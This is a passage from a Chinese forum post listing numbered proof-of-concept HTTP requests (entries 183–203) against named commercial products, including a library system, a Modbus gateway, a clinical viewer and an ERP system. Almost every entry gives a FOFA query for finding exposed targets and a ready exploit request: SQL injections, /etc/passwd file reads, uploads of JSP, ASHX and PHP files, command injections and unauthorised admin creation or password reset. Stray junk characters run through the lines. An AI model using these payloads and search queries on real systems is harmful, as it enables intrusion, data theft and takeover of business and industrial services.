2 e$ L& u" ?/ a. s) ?0 S+ h& c) J183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( _: O9 ^" s  T! uFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
2 p/ c0 T% _$ ?0 [: |GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
3 `( p" W: q: CHost: your-ip9 Z  a, \# d* j. h# l9 _# `
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- m1 ]7 s" ?3 ^) T
Accept-Charset: utf-8
9 R! Q+ Q3 ]6 m  ~# F* ZAccept-Encoding: gzip, deflate  m, B7 ]( X3 f# y
Connection: close( w% n6 z: y7 X$ P7 i9 b8 W7 L
4 }7 e% M% {% G* d. \
' \4 S5 G3 n. S  Z' G4 e2 h' \2 J! `
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加& j6 S5 ^+ k1 F% P+ C( V& t7 l
FOFA:server="SunFull-Webs"& ?. S- N' i* M- P; k/ ?6 O
POST /soap/AddUser HTTP/1.1
4 x. ^: `8 d; |: J- RHost: your-ip
$ L+ m( n8 h9 B3 k- ]) r- LAccept-Encoding: gzip, deflate' @- v" x/ r2 q" _7 g6 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 R* x# C: C& Y5 E+ Q2 |Accept: application/xml, text/xml, */*; q=0.01
/ F( W8 y! _1 Y: Q; R4 w' G. E, JContent-Type: text/xml; charset=utf-8
0 l' b) Q) ]4 Y6 Y7 H: \$ FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* @* L+ Y# w$ I) l2 s+ _8 S. E4 ?X-Requested-With: XMLHttpRequest
5 g6 ]; ^: }2 x# L4 |/ h, W5 j" u  k3 ?( Z* B! M7 p7 |3 c
" V. x/ U0 x5 r! Q* Z% Q# K
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
9 e1 Y4 k# A6 A- H$ S9 x$ {: L: X

: T$ D- E0 D2 P' N/ W/ \- [& U) B5 P185. 瑞友天翼应用虚拟化系统SQL注入
* O& f2 z) v' ]# i0 xversion < 7.0.5.1
. v. R6 ?5 t- m+ {: G# g* p' U' j0 JFOFA:app="REALOR-天翼应用虚拟化系统", s( @3 j' F8 M) G+ S6 q8 U
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
6 D! `$ f% N* Q  RHost: host3 \0 b3 ?  N* C2 b6 e
8 \) d: r0 G$ e8 L% e
* t7 O9 R6 W! ]
186. F-logic DataCube3 SQL注入
* E5 G. \- m: r, d( |CVE-2024-317502 ~; v! G! D0 C, l
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统. f  X" y. @% D! I
FOFA:title=="DataCube3"2 L' U2 j8 p: r; C  |5 \1 p
POST /admin/pr_monitor/getting_index_data.php HTTP/1.11 K+ \0 Z$ t9 B
Host: your-ip
2 t6 x$ P. N$ V$ ^' hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
4 w& d% l$ x) z4 y9 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
5 j! s' U3 F7 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ p0 J0 H; h& s/ j
Accept-Encoding: gzip, deflate& p- y  i$ o$ F% p( |. E
Connection: close: p' E% ]7 H* q1 b7 G& x' F) b% o( Z( \
Content-Type: application/x-www-form-urlencoded
9 @9 w3 d! R+ ]/ r8 d* r. f3 h
+ F; d; M8 L; treq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
4 }. p, N# S4 ^) n1 S3 q1 u7 [* j  p" N# g; G* g

2 [8 s8 I8 z* k; F; l187. Mura CMS processAsyncObject SQL注入
) q7 d% O+ h: m$ e% H  ECVE-2024-32640
' E# p# q0 w4 \$ V! }; M: \* bFOFA:"Mura CMS"
; e  |  W. p3 i/ ~( X) rPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.17 S' c  g, w$ P8 K  t: b
Host: your-ip; G! X2 u8 ?9 A" k9 }
Content-Type: application/x-www-form-urlencoded  a' l* h( A9 q; _& M# F) I

. ^  d! Y4 ?6 t+ O% A5 `+ ~; l! S4 D' y' K2 l" ~; |
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
- R7 V6 e2 ^9 O( m" k' d. A- W# a5 U

1 L. [5 T# ]' c$ E/ W0 T188. 叁体-佳会视频会议 attachment 任意文件读取
* [5 D2 s$ L) \$ pversion <= 3.9.7
6 ^$ V7 `1 X: M7 j' }( C* p4 nFOFA:body="/system/get_rtc_user_defined_info?site_id"
. O! q2 a( W; |/ P; V# qGET /attachment?file=/etc/passwd HTTP/1.1" p6 i! [- d7 p$ l. X# F7 B
Host: your-ip
/ a4 H1 Y& h: QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! s( z4 r# B- ^+ LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. m' D: {6 z& ]' U! r$ }) }; |9 aAccept-Encoding: gzip, deflate
3 f+ D; Q- T* I+ i+ p" tAccept-Language: zh-CN,zh;q=0.9,en;q=0.8; u, O" m; X; V: r0 _- I7 O8 R3 _* b' i
Connection: close
8 r9 N, U" ?& f8 T. q
0 f2 @, m9 G  Q) S, F! u0 }4 T, d6 e- b0 \. T" X3 Y9 Q/ ?
189. 蓝网科技临床浏览系统 deleteStudy SQL注入% e* z) g$ X& j, l* d
FOFA:app="LANWON-临床浏览系统"
4 o4 I9 F. f; k* p" uGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.15 T9 B. S3 o" L5 j$ u  }8 f
Host: your-ip
2 G+ E; p5 \: e, [User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36( r& t8 {3 W( c% p' V0 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 R! r4 X# U6 M: K: h0 n4 [2 e5 b( v
Accept-Encoding: gzip, deflate% r$ Z- ~6 V( }- ]4 D) X
Accept-Language: zh-CN,zh;q=0.9
# [' ~5 f8 c0 P3 r; |# N) m& w. t$ z+ ?Connection: close0 i, z3 M* @# w2 o

& M# ^+ F8 b5 a1 A. f0 C: p0 p: n* S  |* B) a1 N- l$ G
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
2 D$ W( T' ~% d2 jFOFA:title=="短视频矩阵营销系统"
2 _, `4 E; X7 ?; ?4 l( UPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
0 N9 x" I! ~4 BHost: your-ip
$ b( }6 Q( ^: x/ f% LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
7 g7 c4 U- A) p6 d+ b: q, b3 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
2 X6 }! b3 r2 |, H; M+ ?Content-Type: application/x-www-form-urlencoded
( J/ O+ y* G* }0 Z" D  R6 c2 OAccept-Encoding: gzip, deflate
" Z3 u# s& P' D& v: I6 `1 bAccept-Language: zh-CN,zh;q=0.9
9 J$ @& Q" G; M; R& j5 C
/ C$ X6 G) U# [" G) spoi=file:///etc/passwd" I+ \9 i' J! |- H

6 P9 v7 Q# W3 w: h, w) f+ K6 z( m! w; ]. |# e2 h) I
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入. b& }* m5 Z9 ^/ N5 Q
FOFA:body="/CDGServer3/index.jsp"% P  m$ P0 n, s9 E& C3 t$ w: t
POST /CDGServer3/js/../NavigationAjax HTTP/1.1/ M8 p% \! f( \/ G" @( M: q
Host: your-ip
0 P, |0 m3 `$ }: _( k4 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( ~/ m* ?7 o% E6 H* `
Content-Type: application/x-www-form-urlencoded
0 D3 u, ^* G; E/ W# x8 X
4 e( R  z0 y, r% |5 z" j' Ccommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
/ {0 R. x8 _6 H  P% M( D% B$ u- k7 m8 K, P- e. |

  w" M% F4 v0 @2 }$ B192. 富通天下外贸ERP UploadEmailAttr 任意文件上传. I1 O; @2 m* d1 q0 z5 U2 T1 O
FOFA:title="用户登录_富通天下外贸ERP"- w' Z* K: o% y9 D
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1# k5 ^0 G8 p5 Q( E' L# N4 ]4 j1 m" H
Host: your-ip) P! r6 o1 o5 r6 F1 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.366 p7 z0 I" O9 K. g9 U* s
Content-Type: application/x-www-form-urlencoded
- t8 V: A. W/ J3 c8 U7 z+ ]; j9 i+ R: e- P4 u& r

/ m4 p  L2 v9 G<% @ webhandler language="C#" class="AverageHandler" %>9 @2 w% P6 L9 O( Q) I" {1 b
using System;# L+ d& ?& M, a& ^1 E/ u1 [
using System.Web;: ~% Y0 u$ [! S7 ^2 z
public class AverageHandler : IHttpHandler
4 \6 ~1 _, \  O9 B4 Y$ U( y9 H{
8 E% b4 q- `2 J9 Kpublic bool IsReusable
) s0 r% |9 w2 n: L& G{ get { return true; } }
& F: u$ I. P! W+ `3 Mpublic void ProcessRequest(HttpContext ctx)* i' x; i, l7 d. v+ b
{
* V* z  j1 g* R. ?ctx.Response.Write("test");
: ]. @. w# j* U; }0 p/ t}
8 M2 L! H8 J9 w, f- L% _}
4 j1 K4 j. o1 H: [) L9 H, I7 l" _
1 Z: ^" _) v5 a$ s9 V- q
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行  }9 H) a) k+ L/ r4 z4 w5 Q# u
FOFA:body="山石云鉴主机安全管理系统"8 S$ N% f: E/ ?! T2 C, c3 {6 R. ?$ X
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
2 }7 v* G; J5 W; Z: YHost:, H" ]8 i2 y3 B+ w" b
Cookie: PHPSESSID=2333333333333;7 \8 b' `8 @  I9 J! r2 k
Content-Type: application/x-www-form-urlencoded$ D' l3 L  Z& U/ E0 z
User-Agent: Mozilla/5.02 i0 k3 {8 B- [* `' `; L

) {& g- g# |0 f  `7 k" \
# @' B$ l# A0 K6 M) [$ o! ?1 _4 PPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
) y. U. t& |3 {; k7 E; oHost:1 g7 M4 }; V$ Q( w/ {- r* o& |
User-Agent: Mozilla/5.0
; Y* ^) x* ]( ^! u! hAccept-Encoding: gzip, deflate
: z8 i, X+ t2 W% d' IAccept: */*
& p, B( Z) x4 b; q; h, LConnection: close( z( _, ]! E6 ~9 R( y( u! Q' O
Cookie: PHPSESSID=2333333333333;
( o' B, r# E& D2 R% A9 |Content-Type: application/x-www-form-urlencoded
% n; G0 m; ?( u) t% DContent-Length: 84$ @% ^. n4 [5 y$ O8 ?9 S
7 i1 Q- l7 m) U  s8 A
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'); E9 H& ?; M! _9 ]" Y
4 s9 P, l3 J8 f; i$ |/ k/ G/ D
& g9 P, X2 C( E
GET /master/img/config HTTP/1.1- n& `! D; u4 }) ]: x6 g0 r
Host:
4 D, d! c* U7 x  Q  d' ?User-Agent: Mozilla/5.0/ c% _, c! y1 E' x

9 e# N# W' |* y7 U- h. C3 u: L% B' \' [) h& Z( u2 ~: k1 v
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传# p1 e5 N) b. `; ~$ v
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' T' y" S$ a3 M5 h: H7 U! V( e$ X6 @+ c: A# E( {" ]9 p! D; i
POST /servlet/uploadAttachmentServlet HTTP/1.1
! v% Q3 I2 f( O, b" c8 W0 MHost: host6 q/ n2 h4 n" y# W0 p3 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
. ^( h' g% _! i/ O4 K( FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 n8 n; j0 U+ sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 e6 G$ a2 X) C6 r% F3 [* E# B
Accept-Encoding: gzip, deflate
/ f4 o: Z$ z5 Y+ o! NConnection: close
; a, z4 C0 }; H7 X- L2 z( \  BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk) X6 k4 w5 m, u! N, u) r" D! t! Z9 Y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk4 _( o# S0 {* o+ l  L

" k" X% L6 g# d2 t7 I4 wContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"3 f$ T$ Z! h: |# H) r
Content-Type: text/plain
& ~: M/ i4 D; O9 p; U- I8 L6 K8 {<% out.println("hello");%>8 [/ _9 I) ?/ H- k" t+ e
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 E1 x- {  F! F7 _4 jContent-Disposition: form-data; name="json"/ `- G1 }% h, `
{"iq":{"query":{"UpdateType":"mail"}}}; Q- u* h% _& h; Q' N
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
( R" |& `" a- v4 R! x. a) ^) @* {0 t0 G- D$ K9 I8 ~
( a% m0 z- P5 [" _; \5 k/ D" t
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
, ~3 e5 n* V- l' U& q, zFOFA:title=="飞鱼星企业级智能上网行为管理系统& U! \: \$ H6 f
POST /send_order.cgi?parameter=operation HTTP/1.19 y  v8 @+ X' \) e
Host: 127.0.0.1
- S4 y: l; V# B8 L) {- dPragma: no-cache
# M1 [3 o. w8 O6 v4 s, j- yCache-Control: no-cache! L6 q0 T3 H0 |# F- B& R# e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
: X+ `* m, x; U* G% @  OAccept: */*
( H# }8 \- h3 S& ~# ^Accept-Encoding: gzip, deflate
$ t3 s6 |- D% RAccept-Language: zh-CN,zh;q=0.9
5 A. v- `5 h" @# V# i% EConnection: close0 t3 e- `8 ~( A/ n8 C
Content-Type: application/x-www-form-urlencoded# [$ L8 g1 C. y3 z+ ?
Content-Length: 68
1 |! j: W8 A1 o+ O2 e3 I6 ?3 @: }% y9 y
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}+ d' M' L0 Y* t8 i5 p, z8 ^& T

. y( i# y$ ]1 z& U- V: d7 L( t8 t  z8 @' a) b# V
196. 河南省风速科技统一认证平台密码重置+ }7 ?$ V5 h: P) a
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
( w2 d9 W/ v6 N1 k' z+ kPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
4 B% N: U! \) c! l0 x5 f  \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ M$ d8 b9 N+ J2 c- WContent-Type: application/json;charset=UTF-8' {1 \+ J/ y8 Z: P
X-Requested-With: XMLHttpRequest6 e0 E* [) h0 }
Host:4 ]4 d* n: ]4 n  j! U: A
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
3 w  j1 ^1 ?$ _Content-Length: 45
7 h9 P- u5 k. s/ HConnection: close
) m6 G; h4 O2 M) `7 L0 _# V/ c* F/ P  [
{"xgh":"test","newPass":"test666","email":""}4 k4 b. l! ?; D/ p1 b/ p! d4 q

# u! a: y# Y- ?% I+ B7 Q+ v+ X* I, L1 l( e* w( R8 \

% j5 `) n' A! ~7 x+ s8 G# c197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
& H0 Y& g4 w6 HFOFA:app="浙大恩特客户资源管理系统"
  c0 }' V0 E0 yGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.12 v* [  H+ o8 B0 b! P1 W$ S% l/ M3 P9 i
Host:" Z; k8 q$ G, j9 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.368 g, e6 K# U6 p9 L& X  W( S- ]
Accept-Encoding: gzip, deflate  I0 ]1 g) N6 m' @8 E& N
Connection: close
3 Z* L8 C. ?9 ]  ^( O) m7 M0 n9 t( W( l3 c0 c4 q+ ]0 F& H
, _/ k/ E' u0 k4 _5 _+ }" ]% L, B
( ?: k  _5 M6 N) o
198.  阿里云盘 WebDAV 命令注入! d9 T7 F, F( i* R3 ]* h' l
CVE-2024-29640
  J! K7 Q- \) s4 z2 R. E4 W! [GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
6 M# T1 p8 y2 l1 b% ~" k( SCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
# v' h4 ^, e/ s& G$ hAccept: */*6 U( [. b/ Q" q/ X
Accept-Encoding: gzip, deflate
- f) k/ W! q+ hAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
# C  ^8 K1 r# ]% ]: y5 i, TConnection: close4 G! Q  g) J  D: W

$ N* ]6 E2 _9 y( a) f$ D) _/ a2 h/ ?# V$ h- g+ A7 {4 M
199. cockpit系统assetsmanager_upload接口 文件上传
3 H6 @) M0 U1 X; F0 P' i2 Y
9 o( `5 p- M' \% n0 `1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:# ^0 t, y! Z  y6 S
GET /auth/login?to=/ HTTP/1.1: W. S9 K7 f/ p" w9 L' r

( r8 R/ s+ N2 M  F- Y  ^: D响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"2 N% B: ^0 s1 Z5 g$ I" e

; Z7 f/ A, n! K5 E  t2.使用刚才上一步获取到的jwt获取cookie:
" A0 T  q+ C6 _) W! @9 O. z. j- U1 `2 T/ \2 l1 s/ i/ ?
POST /auth/check HTTP/1.1
; Q7 f; B! r1 J  T& @6 EContent-Type: application/json
2 Z' l! z6 y$ W3 y' N) P' z, Q) T; V4 c) H4 K7 x) g. ?$ k3 i2 p
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}. d& G; I" I2 P
( z: f3 P! S! g' i$ _+ ]
响应:200,返回值:" d2 O  d% F$ g  `! U4 p' W8 j/ C+ Z4 g
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
6 @( _9 {* Q" X& o$ m7 YFofa:title="Authenticate Please!"4 @# z  ?7 g0 ?- h, u
POST /assetsmanager/upload HTTP/1.17 X" t/ m6 Q& a) ^
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb38 }6 A$ G% r4 \5 \$ B& k( R  f
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92" v: `7 J  ]% U( u

  a7 v' O. w9 k. {-----------------------------36D28FBc36bd6feE7Fb3
% \& v9 R( [+ V! f; {Content-Disposition: form-data; name="files[]"; filename="tttt.php"
3 _+ o/ ?! v6 ]# }& o8 S% LContent-Type: text/php  T; s1 h+ W; d' |7 w

( A' U7 Z9 u  r1 u0 z/ Z6 P' U<?php echo "tttt";unlink(__FILE__);?>
$ T- [3 r: f, z" {-----------------------------36D28FBc36bd6feE7Fb39 h. D! B, x: X: b, V
Content-Disposition: form-data; name="folder"' }2 y5 d+ z7 N0 C% X

8 G4 j6 m% I3 T5 ?, n-----------------------------36D28FBc36bd6feE7Fb3--: w6 G, \9 c4 n; R. e

" ~- v) {" E7 l2 D5 ?2 W( L9 K+ M2 L: X) Z6 x
/storage/uploads/tttt.php
' y, x, P6 O% c7 n. m. e( M! s3 S0 s4 S
4 ~! r4 L- @+ `200. SeaCMS海洋影视管理系统dmku SQL注入; j6 J, d4 {* n  @7 o/ _& x% y+ z
FOFA:app="海洋CMS"* T* P5 x. B; k6 N
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
0 D# }0 I0 ?* E# p. k/ YCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s- }' R8 Z6 ~0 a  |- x1 o
Upgrade-Insecure-Requests: 1
( W# u' _% ~7 ~Cache-Control: max-age=01 l, W8 S8 ~: C; r- y! t. ]8 h7 _, e. s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: q, q: G" G; v0 o. F# X
Accept-Encoding: gzip, deflate
5 ~7 X: M: K( JAccept-Language: zh-CN,zh;q=0.9! U) G) s2 D1 ]% r2 p8 q& B
2 y7 C: V. c  {& `; B3 j9 R

$ |0 |; |% t9 e! z+ l% Q  z201. 方正全媒体新闻采编系统 binary SQL注入1 H8 S% `5 F1 Q. C$ g' ?, y4 H, T
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"9 U' ?7 X* R1 v/ w
POST /newsedit/newsplan/task/binary.do HTTP/1.1
1 L- V! j- C$ K7 A  Q) IContent-Type: application/x-www-form-urlencoded
$ q. Y  }. F' O* ?% b( `( _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 d  h  u& n, a! o1 @* VAccept-Encoding: gzip, deflate
# t  B0 L: z/ ?Accept-Language: zh-CN,zh;q=0.9
4 c2 w4 T* s6 h; [Connection: close1 c% J3 g9 x% ~6 R, \3 t
* ]; f# y6 s6 @9 h- p
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
1 Z+ }3 Q3 k* {0 X+ v0 `8 o( m9 O$ Q; S
1 f# W& s* I6 D! ?
202. 微擎系统 AccountEdit任意文件上传
3 E3 |; P$ d; G( A) P9 S  PFOFA:body="/Widgets/WidgetCollection/"- K4 J0 b) [, h
获取__VIEWSTATE和__EVENTVALIDATION值
7 S6 f/ d1 T" x7 @! r, b) vGET /User/AccountEdit.aspx HTTP/1.1
! Q( a2 N2 e1 oHost: 滑板人之家( S* i( @! v+ }- `) z6 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
+ J' {* V. X5 g6 O$ `2 lContent-Length: 0
0 r4 h6 F  S0 N4 W/ L5 S, b# i+ m# \" q. ?4 E- J; x/ \! u% k  z& d

" q/ r& p6 B3 E( V/ {( t替换__VIEWSTATE和__EVENTVALIDATION值
3 T- ^) }" q7 a, Y2 Y/ nPOST /User/AccountEdit.aspx HTTP/1.1
9 H+ x; J' ?- S( U8 e1 xAccept-Encoding: gzip, deflate, br
" _$ v3 w' i4 M2 JContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
2 i8 o$ P6 O2 ^7 f9 D. Q. M6 K" U! Q0 H4 u. U
-----------------------------786435874t38587593865736587346567358735687
; w% |! e# f2 C7 d- L$ qContent-Disposition: form-data; name="__VIEWSTATE"
- G* q2 p# x9 U2 ]9 r" w' @4 U" I+ I
__VIEWSTATE% h6 E; a  a" d0 e6 T% t
-----------------------------786435874t385875938657365873465673587356875 N0 X( J2 F) l6 q7 h3 d7 [
Content-Disposition: form-data; name="__EVENTVALIDATION"
% |7 N& z: h1 T; U5 W* {
9 ^, {+ [/ D" s/ G  a1 n4 G$ ___EVENTVALIDATION7 b5 {, ]. j" z# c0 w5 H
-----------------------------786435874t38587593865736587346567358735687( p. L- n" L% }" i3 f0 t
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"2 I0 v' \2 K  P
Content-Type: text/plain7 S8 f# S9 _5 ^/ \" g8 p! B

& d) p' }- `: z7 {Hello World!
8 [5 t: e0 ^' t  _6 y6 l-----------------------------786435874t38587593865736587346567358735687$ G( K) r. ~, Z* d, ^0 I0 P
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"7 C( k/ }1 I* o3 r# O
1 Y+ P: @7 u; ]% B  T% n' g( f
上传图片3 D' U4 c1 W* d1 @4 E( F
-----------------------------786435874t38587593865736587346567358735687) @+ Q) ]' K3 ?2 c2 k
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
& [+ U- }6 b+ x, l- s
9 V6 L2 y- W) \/ E
3 `# R0 A& G' r( [! v  Q-----------------------------786435874t38587593865736587346567358735687
; k$ j& V7 a6 S  E0 |6 ^+ c: n0 ^Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
4 t1 H3 i4 I$ r2 H% M; C) x
4 }- y8 o3 c% A% _" m% ]. F8 ^2 v& \
-----------------------------786435874t38587593865736587346567358735687--5 Z5 T* Q, f& a4 s  H( V
" |5 Z6 h3 w5 I  ]& F" B# ?
- V9 [; u3 C4 I
/_data/Uploads/1123.txt8 O, C/ g% \; ]

  O9 a  e' B2 {7 g203. 红海云EHR PtFjk 文件上传7 w* m3 ^; B4 @1 ?2 Y
FOFA:body="RedseaPlatform"
3 L3 t4 v8 A; s3 \POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
9 K, G$ K( W- q5 `9 \% \Host: x.x.x.x
/ T6 o% t# D  c& XAccept-Encoding: gzip
/ g5 T" m; t. R  U; p  n. j% b& RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 l, q; ?# Q/ ^- e( W$ E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4' [' \& \- M3 _5 m# H: s- [
Content-Length: 210
5 \5 e4 Q3 ^* F( y$ d( n0 N" `0 ~! K# A, |: L9 d- f2 }
------WebKitFormBoundaryt7WbDl1tXogoZys4
" M& w! _* e# C1 t# G1 sContent-Disposition: form-data; name="fj_file"; filename="11.jsp"" |% Q/ W2 @) ^4 j1 R2 G2 B2 w1 h+ e
Content-Type:image/jpeg1 t" J1 U  U9 N

- {$ M* m& q/ O) q4 p<% out.print("hello,eHR");%>7 [, U5 j- @! {& K
------WebKitFormBoundaryt7WbDl1tXogoZys4--
+ a2 o% w2 m( u6 \4 H8 d- m
# j2 X7 [8 I% F& e9 @
+ k  e  e) h" h. l* I+ {0 w: W2 {! f/ m- C+ R

! e) \( T" C5 ~$ e; z- Z
/ f3 U5 ~1 i) s3 {2 [. u! Q4 `) ]- \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表